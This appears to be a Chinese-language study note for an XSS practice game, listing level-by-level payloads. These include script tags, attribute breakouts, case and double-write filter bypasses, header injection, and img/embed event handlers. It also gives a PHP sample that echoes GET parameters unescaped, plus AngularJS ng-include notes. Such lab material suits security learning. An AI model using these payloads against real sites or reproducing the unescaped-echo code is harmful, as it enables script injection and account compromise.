xss
url:http://test.ctf8.com/level1.php?name=test
小游戲payload:
<script>alert("'test'")</script>
"><script>alert("'test'")</script>
' onclick=alert("'test'") '
" onclick=alert("'test'") "
"><a href=javascript:alert("'test'")>test</a>
"><scRipt>alert("'test'")</sCript>
"><scriscriptpt>alert("'test'")</scriscriptpt>
javascript:alert(1)
javascript:alert(1)/* http://test*/
?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
Referer: test" onclick=alert("'test'") type="text
User-Agent:test" onclick=alert("'test'") type="text
Cookie: user=test" onclick=alert("'test'") type="text
- 據說是一個圖片中的exif信息,但是網址已失效;
level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
level16.php?keyword=<img%0asrc=x%0aonerror=alert("'test'")>
level17.php?arg01=a&arg02= onmouseover=alert("'test'")
level18.php?arg01= onmouseover=alert("'test'")&arg02=b
- flash xss
- flash xss
有些參數可能會隱藏哦:
源碼:get.php
<?php
echo "<h2>php變量提交get參數:</h2>";
$str = $_GET["name"];
$str2 = $_GET["sex"];
echo "<h2>form表單提交get參數</h2>".'
<center>
<form id=form>
<p>姓名:</p><input name="name" value="'.'" type="text">
<p>input通過php接收姓名參數:</p><input name="form" value="'.$str.'" type="text">
<p>直接接收php性別參數</p><input name="form2" value="'.$str2.'" type="text">
<input type="submit" value="提交"/>
</form>
</center>';
?>
- url中能看到的參數:
?name=xiaoming&form=&form2=
- 沒有在URL中顯示參數:
&sex=
- DOM不經過服務器的
- 能顯示在url中的參數中的是form表單中name屬性定義的參數;php定義的需要手動添加,或者鏈接到form表單上;
在線編碼網站:http://monyer.com/demo/monyerjs/
<embed>
標簽
embed可以用來插入各種多媒體,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src為音頻或視頻文件及其路徑,可以是相對路徑或絕對路徑。
支持事件屬性;
彈窗方式:
<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>
<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>
AngularJS中的ng-include
- 是否是在服務器上運行的。(注意不是服務器上,直接打開HTML文件是不行的)
- 文件路徑是否對,如果是同一文件夾中,這樣寫:(注意其中的“”中間還有個‘’)
- ng-controller="myCtrl"是不是正確,如果沒有對應的controller
- 組件
<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>
fath.html內容:
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
</head>
<body>
<div ng-include="'son.html'"></div>
<!-- 路徑里面必須帶上單引號 -->
<!-- 注意:如果 ng-controller沒有對應的方法,就不要寫了,會報錯-->
</body>
son.html內容:
Hello world